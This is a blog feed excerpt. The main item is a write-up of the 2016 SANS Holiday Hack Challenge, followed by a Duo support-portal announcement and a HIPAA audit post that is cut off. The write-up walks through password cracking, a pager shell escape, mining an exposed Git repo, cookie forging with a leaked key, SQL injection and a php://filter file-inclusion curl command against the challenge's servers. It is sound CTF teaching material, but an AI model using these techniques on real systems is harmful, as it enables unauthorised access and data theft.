<![CDATA[SANS Holiday Hack Challenge Write-Up]]> https://duo.com/blog/sans-holiday-hack-challenge-write-up https://duo.com/blog/sans-holiday-hack-challenge-write-up Mon, 09 Jan 2017 00:00:00 -0500

Every year during the holiday season, SANS publishes their annual Holiday Hack Challenge. These challenges are a great way to learn new and useful exploitation techniques to solve fun puzzles.

I always enjoy participating in the Holiday Hack Challenges, and have written about my solutions in the past. The challenges have been very polished, and this year is no exception.

I first want to extend thanks to Ed Skoudis and the SANS team for always putting together a polished, fun challenge that never fails to teach something new.

This year’s contest consisted of 5 parts, each with their own challenges. I’ve split up my write-up according to those parts.

Table of Contents

Part 1: A Most Curious Business Card

In the story for this challenge, Santa has been abducted and we need to rescue him. His business card is the only clue we have:

Santa Claus Business Card

Analyzing Santa’s Tweets

The first question asks us to find the secret message in Santa’s tweets. Looking at the Twitter profile from the business card, we find tweets that appear to contain random words:

Santa Claus Tweets

I wrote this Python script to download and store all the tweets from the Twitter feed to get a better understanding of what the tweets might mean:

import tweepy

consumer_key = ''
consumer_secret =''
access_token = ''
access_token_secret = ''

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)

api = tweepy.API(auth)

for status in tweepy.Cursor(
        api.user_timeline, id="santawclaus").items(400):
    print status.text

After the script runs, we are left with a list of tweets. Looking at the tweets in a text editor reveals the secret message “BUG BOUNTY” in ASCII art.

Finding the ZIP File

The next question asks to determine “what is inside the ZIP file distributed by Santa’s team”. Not having a ZIP file on hand, I investigated the Instagram account referenced on Santa’s business card.

This account contains a picture of a messy desk. Zooming into the picture gave the following clues:

An nmap report for www.northpolewonderland.com

Nmap Report

2) A screenshot containing the filename “SantaGram_v4.2.zip”

SantaGram Screenshot

Visiting www.northpolewonderland.com shows a copy of the business card. However, requesting www.northpolewonderland.com/SantaGram_v4.2.zip downloads a copy of a password protected .zip file.

The password to the .zip file is “bugbounty” - the secret message encoded in Santa’s tweets:

$ unzip SantaGram_v4.2.zip
Archive:  SantaGram_v4.2.zip
[SantaGram_v4.2.zip] SantaGram_4.2.apk password:
  inflating: SantaGram_4.2.apk

This extracts an APK file for the social networking SantaGram application.

Part 2: Analyzing the APK

APK files are used to distribute Android applications. These are just .zip files containing the resources and code that make up the application.

It is possible to decompile the APK file into human readable source code, making analysis of the application much easier.

The first step is to use a tool called apktool to decode the contents of the APK. This extracts any resources and metadata into XML files. In addition to this, apktool disassembles the application into an intermediate “smali” representation.

We can decompile the application with apktool like this:

$ apktool d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

The smali representation can be difficult to read. We can use tools like dex2jar and jd-gui to turn the APK into much more readable Java source code.

We’re asked what username and password are buried in the APK. We can do a simple grep -R “password” . to find files that reference a password. This points us to two files: b.java and SplashScreen.java:

$ grep -R "password" .
./b.java:            jsonobject.put("password", "busyreindeer78");
<snip>
./SplashScreen.java:            jsonobject.put("password", "busyreindeer78");

Opening up these files in a text editor reveals the credentials “guest:busyreindeer78”:

jsonobject.put("username", "guest");
jsonobject.put("password", "busyreindeer78");

These credentials are used to post JSON analytics data to a URL, but we’ll focus on exploiting that service later.

Next, we’re asked to find the name of an audio file in the APK. Doing a simple find through our resources reveals the name of an MP3 file:

$ find . -name *.mp3 -exec ls {} \;
./src/com/northpolewonderland/santagram/debug-20161224235959-0.mp3

We’ll come back to the APK later, but first we have to analyze another system - the “Cranberry Pi”.

Cracking the Cranberry Pi

There are password protected doors in the game that lead to more clues about Santa’s location. The passwords for these doors are found by exploiting terminals located next to each door. To interact with the terminals, we need to search the game map for pieces of the “Cranberry Pi” a Raspberry Pi with a specialized Linux distribution loaded onto it.

Since this write-up is about the technical aspects of the challenge, we’ll skip the discussion on collecting the pieces. After we’ve collected all the pieces, we are given a link to download a “Cranbian” image at http://northpolewonderland.com/cranbian.img.zip.

This .zip file contains an image of a Cranberry Pi. We can mount this filesystem using the same technique outlined in this SANS blog post.

$ fdisk -l cranbian-jessie.img
Disk cranbian-jessie.img: 1.3 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1

Device               Boot  Start     End Sectors  Size Id Type
cranbian-jessie.img1        8192  137215  129024   63M  c W95 FAT32 (LBA)
cranbian-jessie.img2      137216 2713599 2576384  1.2G 83 Linux

$ mount -v -o offset=$((512*137216)) -t ext4 cranbian-jessie.img /mnt/sans/

Mounting the filesystem gives this file tree.

We’re asked to find the password for the “cranpi” user. We can crack the password using the popular rockyou.txt wordlist like this:

$ unshadow /mnt/sans/etc/passwd /mnt/sans/etc/shadow > sans_passwd
$ john --wordlist=rockyou.txt sans_passwd

This reveals the password “yummycookies”, which allows us to access the terminals.

Part 3: Attacking the Terminals

Terminal 1: PCAP Extraction

The first terminal we encounter tells us the passphrase is located inside the file /out.pcap.

Out Passphrase

The file /out.pcap is owned by the itchy user, and we’re logged in as scratchy.

-r--------   1 itchy itchy 1.1M Dec  2 15:05 out.pcap

Fortunately, our sudoer permissions come in handy:

scratchy@718dd6fdd7d2:~$ sudo -l
sudo: unable to resolve host 718dd6fdd7d2
Matching Defaults entries for scratchy on 718dd6fdd7d2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 718dd6fdd7d2:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings

This tells us that we can run /usr/sbin/tcpdump and /usr/bin/strings as the itchy user by doing something like:

sudo -u itchy /usr/sbin/tcpdump -r /out.pcap

We’re told the passphrase is two parts. Dumping the pcap as ascii (-A), I found this HTTP request:

GET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.12+
Content-type: text/html
Content-Length: 113
Last-Modified: Fri, 02 Dec 2016 11:25:35 GMT
<html>
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>

So the first part is “santasli”.

Admittedly, I had quite a bit of trouble with the second half. I could tell there was an HTTP request for /secondhalf.bin which returned what appeared to be a random blob of data.

After trying different pcap carving techniques with no luck, someone recommended not to overthink the challenge, and read the man pages thoroughly.

The man page for the strings command shows that there is a flag for different encoding. Trying the flag for 16-bit little-endian character encoding revealed the second half of the passphrase:

$ sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper

Terminal 2: The Wumpus

Our second terminal tells us the passphrase is given after we beat “the wumpus”:

The Wumpus

There’s an x64 binary in our home directory called wumpus. Executing it starts a game. We can either play the game or cheat.

Cheating it is.

I first wanted a local copy of the binary for debugging. I used base64 to encode the binary and then copy/pasted the contents into my own terminal. I could then decode the content to get a clone of the original binary.

Disassembling the game in gdb shows these functions:

(gdb) info functions
All defined functions:

Non-debugging symbols:
<snip>
0x0000000000400d26  main
0x000000000040111e  display_room_stats
0x00000000004012a8  take_action
0x0000000000401383  move_to
0x0000000000401740  shoot
0x0000000000401af3  gcd
0x0000000000401b27  cave_init
0x0000000000401eae  to_upper
0x0000000000401f1a  clear_things_in_cave
0x0000000000401fb3  initialize_things_in_cave
0x00000000004021a4  getans
0x0000000000402238  bats_nearby
0x00000000004022b6  pit_nearby
0x0000000000402334  wump_nearby
0x000000000040241c  move_wump
0x0000000000402476  int_compare
---Type <return> to continue, or q <return> to quit---
0x00000000004024a0  instructions
0x0000000000402607  usage
0x0000000000402633  wump_kill
0x0000000000402644  kill_wump
0x0000000000402866  no_arrows
0x0000000000402877  shoot_self
0x0000000000402888  jump
0x00000000004028aa  pit_kill
0x00000000004028bb  pit_survive
0x00000000004028d0  __libc_csu_init
0x0000000000402940  __libc_csu_fini
0x0000000000402944  _fini

The function kill_wump immediately sticks out. Starting the program and using gdb to jump to the address of the kill_wump function beats the game and gives the passphrase.

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/wumpus
Instructions? (y-n) ^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b0cba0 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:81
81  ../sysdeps/unix/syscall-template.S: No such file or directory.

(gdb) jump *0x0000000000402644
Continuing at 0x402644.
*thwock!* *groan* *crash*

A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!

Passphrase:
WUMPUS IS MISUNDERSTOOD

Terminal 3: Hidden Directories

The next terminal asked us to find the passphrase file buried in directories:

Directories

I first used the command ls -alR to recursively list the contents of each directory. This showed that there was a file, key_for_the_door.txt, which was hidden under multiple directories named with special characters designed to make it difficult to traverse.

Instead of manually trying to traverse the directories, I solved the challenge using find:

elf@4978b123e95c:~$ find . -name key_for_the_door.txt -exec cat {} \;
key: open_sesame

That key opened the door, which led to a room with a Wargames emulator. Using the dialog taken from youtube clips and other references, we can get all the way to launching a strike, which gives a key: LOOK AT THE PRETTY LIGHTS

Terminal 4 - Train Station

This terminal at the train station presented a train management interface:

Train Management Interface

Running the HELP command displays a help file containing a hint mentioning the use of “less”.

menu:main> HELP
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS you know something I don't.

This article gives helpful tips on how to escape pagers like less and more. Since this help file itself is using less, we can use the simple shell escape :?!/bin/sh to drop into a shell.

In the shell, we can run the “ActivateTrain” script and see an animation that takes us back in time to 1978.

sh-4.3$ ls
ActivateTrain  TrainHelper.txt  Train_Console
sh-4.3$ ./ActivateTrain

Activate Train

After we travel back in time, we find Santa in the same room that was protected by the Wumpus terminal.

Santa Captured

It’s great that we found Santa, but we still don’t know who captured him in the first place. For the last part of the challenge, we’ll exploit multiple North Pole services to collect clues and discover who captured Santa.

Part 4: The North Pole Bug Bounty

We found the first MP3 file in the APK we analyzed in Part 2. This APK also contains a resource file that discloses the following URLs:

https://analytics.northpolewonderland.com/report.php?type=launch : 104.198.252.157
https://analytics.northpolewonderland.com/report.php?type=usage : 104.198.252.157
http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5 : 104.198.221.240
http://dev.northpolewonderland.com/index.php : 35.184.63.245
http://dungeon.northpolewonderland.com/ : 35.184.47.139
http://ex.northpolewonderland.com/exception.php : 104.154.196.33

After confirming with the game’s “oracle” that each of these IP addresses are in scope, we can start hacking.

Mobile Analytics Server

Credentialed Access

Hitting the main URL https://analytics.northpolewonderland.com takes us to a login page. We can log in with the credentials we pulled from the APK in Part 2 (guest:busyreindeer78) to get access:

Sprusage Login Query Page

Clicking the “MP3” link downloads the second audio file.

After doing some testing, I decided to fall back to square one and nmap the host. I recalled a hint from one of the elves mentioning to look for hidden files so I ran nmap with the --script http-enum flag to check for common files and folders.

This gave the following output:

PORT    STATE SERVICE
22/tcp  open  ssh
443/tcp open  https
| http-enum:
|   /login.php: Possible admin folder
|_  /.git/HEAD: Git folder

Leaving a Git repository exposed is a classic mistake. We can use the steps outlined here to clone the repo.

Downloading the contents of the folder and running git status shows files that are staged to be deleted:

root@sans:~/sans/analytics# git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

    deleted:    README.md
    deleted:    crypto.php
      <snip>
    deleted:    db.php
    deleted:    edit.php
    <snip>
    deleted:    login.php
    deleted:    logout.php
    deleted:    mp3.php
    deleted:    query.php
    deleted:    report.php
    deleted:    sprusage.sql
    deleted:    test/Gemfile
    deleted:    test/Gemfile.lock
    deleted:    test/test_client.rb
    deleted:    this_is_html.php
    deleted:    this_is_json.php
    deleted:    uuid.php
    deleted:    view.php

Resetting our current working directory restores the files:

root@sans:~/sans/analytics# git checkout -- .
root@sans:~/sans/analytics# ls
crypto.php  db.php    fonts       getaudio.php  index.php  login.php   mp3.php    README.md   sprusage.sql  this_is_html.php  uuid.php
css         edit.php  footer.php  header.php    js         logout.php  query.php  report.php  test          this_is_json.php  view.php

The contents of the PHP files show a web app that lets users create and save reports.

Access control in the application is done through a function called restrict_page_to_users. This function checks to make sure a username was provided and, if so, calls the function check_access to make sure the username is allowed to visit the page.

Here’s the check_access function:

  function check_access($db, $username, $users) {
    # Allow administrator to access any page
    if($username == 'administrator') {
      return;
    }

    if(!in_array($username, $users)) {
      reply(403, 'Access denied!');
      exit(1);
    }
  }

So, if we can somehow login as the administrator user, we’ll have access to every page.

Remember: Our goal is to get the MP3 files for later steps, which is why we want admin access.

Admin Access #1 Forging Cookies

Logging in to the web application is handled the usual way - send a username/password, it’s checked against the database and, if all looks good, a session cookie is set. The SQL access looks fine, so we need to break the cookie generation.

The session cookie is created as follows (from login.php):

    $auth = encrypt(json_encode([
      'username' => $_POST['username'],
      'date' => date(DateTime::ISO8601),
    ]));

    setcookie('AUTH', bin2hex($auth));

This creates a cookie using a custom encrypt routine in crypto.php. The encrypt function uses PHP’s mcrypt implementation to encrypt the username and current date. However, the encryption key is left in the code.

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");  

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

This means that we can craft our cookies that will be accepted by the web application. Here’s some sample code:

<?php

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}
echo bin2hex(encrypt(json_encode([
   'username' => "administrator",
   'date' => date(DateTime::ISO8601),
])));
?>

After generating our cookie, we can use a cookie manager extension to add the cookie value.

Add Cookie Value

Refreshing the page results in admin access to the application.

Admin Access #2 Storing Credentials in Git

Accidentally committing credentials into a Git repo is harmful because it can be difficult to remove them.

Looking through the output of git log, we see commit d9636a3d648e617fcb92055dea63ac2469f67c84 which claims to give “small authentication fixes”. Comparing that commit with the commit before it reveals administrative credentials:

root@sans:~/sans/analytics/# git diff d9636a3d648e617fcb92055dea63ac2469f67c84 d9636a3d648e617fcb92055dea63ac2469f67c84^
diff --git a/sprusage.sql b/sprusage.sql
index cb262e4..c7254f8 100644
--- a/sprusage.sql
+++ b/sprusage.sql
@@ -37,7 +37,6 @@ CREATE TABLE `reports` (

 <snip>
+INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
<snip>

--- Dump completed on 2016-11-13 19:20:20
+-- Dump completed on 2016-11-13 19:17:27
diff --git a/test/test_client.rb b/test/test_client.rb
index 847cf97..ac67d4f 100644
--- a/test/test_client.rb
+++ b/test/test_client.rb
<snip>
-    :username => ARGV[0],
-    :password => ARGV[1],
+    :username => 'administrator',
+    :password => 'KeepWatchingTheSkies',
<snip>

Trying the credentials “administrator:KeepWatchingTheSkies” logs us in as admin.

Mobile Analytics Server - Post Authentication

There’s only one page that doesn’t allow access from the guest user: edit.php.

  # Don't allow anybody to access this page (yet!)
  restrict_page_to_users($db, []);

This page claims to not let anyone access it, but remember that check_access always allows access from the administrator.

This page lets us edit the attributes of a saved query. There didn’t appear to be any immediate vulnerabilities, since it appeared we could only update the name, id, or description:

Edit Attributes of Saved Query

However, let’s take a step back and see how queries are stored. In our schema, reports are structured like this:

CREATE TABLE `reports` (
  `id` varchar(36) NOT NULL,
  `name` varchar(64) NOT NULL,
  `description` text,
  `query` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Wait - what’s “query”? That’s the SQL query that’s actually run when we view our report. We can verify that in query.php:

$result = mysqli_query($db, "INSERT INTO `reports`
    (`id`, `name`, `description`, `query`)
    VALUES
    ('$id', '$name', '$description', '" . mysqli_real_escape_string($db, $query) . "')
");

Looking back at edit.php, we see that the code checks every attribute to see if we set it as a parameter in our request. If it’s set by us, it’s updated:

$set = [];
foreach($row as $name => $value) {
    print "Checking for " . htmlentities($name) . "...<br>";
    if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
    }
}

This includes the report’s query field.

This means that we can create a report, grab the ID, and use the edit.php script to set the report query to an arbitrary SQL query which is then run when we view the report. By using backticks, we can bypass the call to mysqli_real_escape_string.

For example, this sets the query to dump out all the MP3 file information:

https://analytics.northpolewonderland.com/edit.php?id=a30d8ed5-b0d4-4969-b6d8-c4c241f1fc49&query=SELECT%20*%20FROM%20`audio`

Viewing that report shows the results:

Query UUID

Ok, we have the id of the mp3, now we need the actual file. Unfortunately, getaudio.php has a hard check to make sure only the guest user can download MP3’s by id.

To get around this, we’ll change our query to ``SELECT username, filename, TO_BASE64(mp3) FROM `audio``` and we can grab the MP3.

Dungeon Game

During the course of the game, we were given a .zip file from one of the elves containing what appears to be a local copy of the “dungeon” game, as well as a data file in some odd format.

The URL dungeon.northpolewonderland.com is referenced in the APK resources, but there are no references to the URL in the application code itself.

Running an nmap scan on dungeon.northpolewonderland.com shows port 11111 open:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 15:fb:7c:8a:bc:b6:bb:e7:87:77:65:5c:47:31:a6:cd (DSA)
|   2048 0a:23:40:36:ad:21:e5:78:a5:4a:b6:cd:7e:b9:12:e2 (RSA)
|_  256 88:ad:73:c4:8e:c3:10:38:32:fe:98:f4:80:6a:de:38 (ECDSA)
80/tcp    open  http    nginx 1.6.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.6.2
|_http-title: About Dungeon
11111/tcp open  vce?

Connecting to this port starts a remote instance of the dungeon game.

root@sans:~/sans# nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.         This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

We can play the game fairly or we might be able to cheat.

Cheating it is.

We’ll start by analyzing the local version for any vulnerabilities we can use to beat the remote version.

Running the dungeon binary in gdb and disassembling the main function.

It looks like main is responsible for setting up some game state, and then calling the game_ function. Disassembling that gives quite a bit of information. I’ve snipped some of it out, but you can find the relevant pieces here.

One thing that sticks out is a string comparison after the user’s command is read:

   0x0000000000404996 <+101>:   mov    esi,0x419a34
   0x000000000040499b <+106>:   mov    rdi,rax
   0x000000000040499e <+109>:   call   0x400d00 <strcmp@plt>
   0x00000000004049a3 <+114>:   test   eax,eax
   0x00000000004049a5 <+116>:   jne    0x4049ae <game_+125>
   0x00000000004049a7 <+118>:   call   0x40a1df <gdt_>

After we submit a command, it’s checked against a string stored at 0x419a34. To figure out what that string is, we can run the gdb command x/s 0x419a34:

(gdb) x/s 0x419a34
0x419a34:   "GDT"

If our action in the game is “GDT”, something special happens. Trying it out, we’re dropped into what appears to be a debug shell:

>GDT
GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take

It’s likely that we could use the debug menu to take the treasures and put them in the room, beating the game that way. But, I figured that when the game is beaten, we’d likely see text telling us where to get the next MP3.

There’s a command listed, DT, that dumps out a text string in the game. It asks for which text string (a number) you want to receive. Doing a quick binary search shows the final string is at index 1028. Backing up a few steps through trial and error and dumping the string 1024 gives this response:

GDT>dt
Entry:    1024
The elf, satisified with the trade says -
Try the online version for the true prize

Moving to the online version of the game and doing the same steps gives us the final result:

GDT>dt
Entry:    1024
The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.

Sending an email to the address returns the MP3.

Email With MP3

Debug Server

The URL dev.northpolewonderland.com is referenced only once in the APK - in the EditProfile page. To use the endpoint in the app, a remote debugging flag has to be set.

The app sends 4 variables to the server:

bundle.put("date", (new SimpleDateFormat("yyyyMMddHHmmssZ")).format(Calendar.getInstance().getTime()));
bundle.put("udid", android.provider.Settings.Secure.getString(getContentResolver(), "android_id"));
bundle.put("debug", (new StringBuilder()).append(getClass().getCanonicalName()).append(", ").append(getClass().getSimpleName()).toString());
bundle.put("freemem", Runtime.getRuntime().totalMemory() - Runtime.getRuntime().freeMemory());

After some trial and error, it looks like the important thing is that the “debug” parameter is properly set. The Java code setting it resolves to "com.northpolewonderland.santagram.EditProfile, EditProfile". If we have that set correctly, we can put arbitrary input for the other parameters and get this output:

{"date":"20161217185543","status":"OK","filename":"debug-20161217185543-0.txt","request":{"date":"20161212112233","udid":"1","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":"test","verbose":false}}

Requesting the file returned in the “filename” attribute returns the original data we sent.

One thing I notice is that mixed in with the output we receive is a variable called “verbose”. This variable isn’t in the APK, but let’s try setting that to “true”:

curl -XPOST -H "Content-Type: application/json" dev.northpolewonderland.com -d '{"date" : "20161212112233", "udid" : "1", "debug" : "com.northpolewonderland.santagram.EditProfile, EditProfile", "freemem" : "", "verbose" : true}'

We get the following output, which looks to include a listing of all the files in the directory:

{  
   "date":"20161218000051",
   "date.len":14,
   "status":"OK",
   "status.len":"2",
   "filename":"debug-20161218000051-0.txt",
   "filename.len":26,
   "request":{  
      "date":"20161212112233",
      "udid":"1",
      "debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
      "freemem":"echo",
      "verbose":true
   },
   "files":[  
      "debug-20161217233050-0.txt",
      "debug-20161217235834-0.txt",
      "debug-20161217235844-0.txt",
      "debug-20161217235909-0.txt",
      "debug-20161217235921-0.txt",
      "debug-20161218000007-0.txt",
      "debug-20161218000025-0.txt",
      "debug-20161218000051-0.txt",
      "debug-20161224235959-0.mp3",
      "index.php"
   ]
}

We can browse to the MP3 path returned and retrieve the file.

Banner Ad Server

The site at ads.northpolewonderland.com is a web application written using Meteor:

Web Application

Not being familiar with the framework, this blog post came in handy.

Installing TamperMonkey and Meteor Miner revealed the following routes:

/aboutus
/admin/quotes
/affiliate/:affiliateId
/campaign/create
/campaign/review
/campaign/share
/create
/
/login
/manage
/register

Visiting the /admin/quotes page, we are told there are 5 records returned in the HomeQuotes collection, and that one of these records has an additional “audio” field.

We can dump the records by running the command HomeQuotes.find().fetch() in the Chrome devtools console. The record that stands out is:

This record contains an audio attribute revealing the path to the MP3 we’re looking for.

Uncaught Exception Handler Server

The URL ex.northpolewonderland.com/exception.php is used in a couple of places in the APK to write crash dumps in case of application errors. Looking through the decompiled Java code, we have to supply an “operation” and a “data” parameter to have our request accepted as valid JSON. Setting these to arbitrary values returns a sample response like this:

{
    "success" : true,
    "folder" : "docs",
    "crashdump" : "crashdump-cplJXU.php"
}

The operation specified in the source code is “WriteCrashDump”. If I change that to “ReadCrashDump”, I get this error:

Fatal error! JSON key 'data' must be set.

Setting a data key returns this error:

Fatal error! JSON key 'crashdump' must be set.

Looks like it will try to load the crashdump file specified in the data field. Trying “crashdump-cplJXU” returned the data that I sent in my initial request.

This is almost certainly an LFI vulnerability. Unfortunately, we can’t specify filenames directly since they have the “.php” extension appended which causes them to be processed by the server.

We can use PHP filters to get around this and dump out the source code of PHP pages, as described in this article.

This is the curl command to get the source code of the exception.php file:

curl -XPOST -H "Content-Type: application/json" http://ex.northpolewonderland.com/exception.php -d '{ "operation" : "ReadCrashDump", "data" : { "crashdump" : "php://filter/convert.base64-encode/resource=../exception" } }'

Sending this to base64 -d returns the PHP source.

The source tells us that the MP3 is in the webroot, so we can just grab it:

$ wget ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
--2016-12-17 12:39:34--  http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
Resolving ex.northpolewonderland.com... 104.154.196.33
Connecting to ex.northpolewonderland.com|104.154.196.33|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223244 (218K) [audio/mpeg]
Saving to: 'discombobulated-audio-6-XyzE3N9YqKNH.mp3'

discombobulated-audio-6-XyzE3N9YqKNH.mp3           100%[================================================================================================================>] 218.01K   353KB/s    in 0.6s

2016-12-17 12:39:38 (353 KB/s) - 'discombobulated-audio-6-XyzE3N9YqKNH.mp3' saved [223244/223244]

Part 5: Finding Santa’s Captor

After we gathered all 7 MP3 samples, we can reassemble them to find Santa’s captor. Listening to the samples, it seemed as though they had been slowed down.

Importing all the audio samples into Audacity, aligning them end-to-end, and increasing the tempo revealed the phrase:

Father Christmas, Santa Claus. Or, as I've always known him, Jeff.

Using this as the passphrase to the last door reveals that Santa’s captor was Dr. Who.

Dr. Who

Conclusion

The team at SANS really outdid themselves with this year’s Holiday Hack challenge. The tasks were approachable while still presenting a challenge, and the entire game was polished.

Events like this Holiday Hack challenge as well as CTF’s that are held throughout the year are a great way to sharpen skills and learn something new. I highly recommend not only participating in challenges like this, but also reading how other people solved the same challenges, because they may have solved them in completely different ways.

I’m already looking forward to next year’s challenge!

]]>
<![CDATA[Announcing the Duo Help Center Ticket Portal]]> https://duo.com/blog/announcing-the-duo-help-center-ticket-portal https://duo.com/blog/announcing-the-duo-help-center-ticket-portal Fri, 06 Jan 2017 00:00:00 -0500

One of our main priorities is continuously improving our customers’ support experience at Duo. Toward that goal, we are excited to announce the public launch of our support ticket management portal functionality in the Duo Help Center.

In addition to our existing Knowledge Base, the Help Center now includes the ability for you to file and manage your support cases. This functionality is available for all paying editions.

To access the ticket management portal, administrators need to log in at admin.duosecurity.com and click the Support Tickets link in the navigation bar on the left:

Duo Support Ticket Portal

In the portal you’ll be able to view a comprehensive record of your support cases, submit new tickets to the Duo Support Team, and view & update ongoing cases at any time. When an issue has been resolved, you will be able to provide feedback on your support experience.

We believe that managing your support cases from the Help Center ensures the most secure and efficient experience for tracking issues you may encounter when using Duo’s products. You will also be able to view issues submitted by other Duo Administrators on your account. This reduces the risk of creating duplicate issues and increases awareness across your organization.

While Knowledge Base content will remain publicly accessible, the ticket management portal requires authentication to your account and can only be accessed by listed administrators for all paid editions.

If you have any feedback while using the new Help Center functionality, please contact us support@duo.com.

]]>
<![CDATA[Healthcare & Business Associates: Prepare for 2017 HIPAA Audits]]> https://duo.com/blog/healthcare-and-business-associates-prepare-for-2017-hipaa-audits https://duo.com/blog/healthcare-and-business-associates-prepare-for-2017-hipaa-audits Wed, 04 Jan 2017 09:00:00 -0500

Calling all healthcare organizations, providers, hospitals and business associates - are you ready for the HIPAA security audits coming in 2017?

The governing body that enforces the Health Insurance Portability and Accountability Act of 1996 (HIPAA), the Office for Civil Rights (OCR) will be conducting a small number of onsite and desk audits, and has contacted 167 healthcare providers and 48 business associates last year, according to HealthcareITNews.com.

Business associates include vendors that provide services to healthcare organizations, and may be held liable for a breach of healthcare patient data or security. A few examples of business associate services include legal, actuarial, consulting, accounting, data aggregation, financial, etc. Learn more about business associates.

The OCR will launch its full audit program to help assess HIPAA compliance efforts and discover new security risks in order to provide better guidance for healthcare organizations and business associates.The OCR is looking for policies and procedures related to the HIPAA Privacy, Security and Breach Notification rules. See specifics about each area, and what the OCR is looking for in its audit protocol.

Two major problem areas the OCR has seen in past audits are the implementation of risk analysis and risk management.

Risk Analysis for Healthcare

According to HHS.gov, the risk analysis process identifies threats and vulnerabilities to systems containing electronic protected health information (ePHI).

HHS.gov references the National Institute of Science and Technology (NIST) Special Publication (SP) 800-30 when it comes to guidance for different types of threats:

  1. Human: Incidents enabled or caused by humans. They can be unintentional (inadvertent data entry) or deliberate (malicious software, network-based attacks, unauthorized access, etc.).
  2. Natural: Disasters that may affect systems containing data or networks, including floods, earthquakes, electrical storms, etc.
  3. Environmental: Long-term power failure, pollution, chemicals, and liquid leakage.

Vulnerabilities may fall in the Human category, and are defined in NIST SP 800-30 as a “flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system’s security policy.”

A risk analysis includes:

  • Taking inventory of all systems and applications used to access and store data
  • Classifying systems and apps by level of risk
  • An assessment of current security measures
  • The likelihood and potential impact of threat occurrence
  • Anticipated consequences of lost or damaged data and corrupted data systems

This guide, HIPAA Security Series: Basics of Risk Analysis and Risk Management provides some more in-depth guidance for step-by-step example risk analyses and risk management plans that both healthcare organizations and their business associates can use to customize to their needs.

Risk Management for Healthcare

Risk management is the actual implementation of security measures to reduce an organization’s risk of losing or compromising its patient data, as well as to meet general security standards, according to the HHS.

According to NIST, the risk management framework includes:

  • Categorizing information systems
  • Selecting, implementing and assessing security controls
  • Authorizing information systems
  • Monitoring security controls

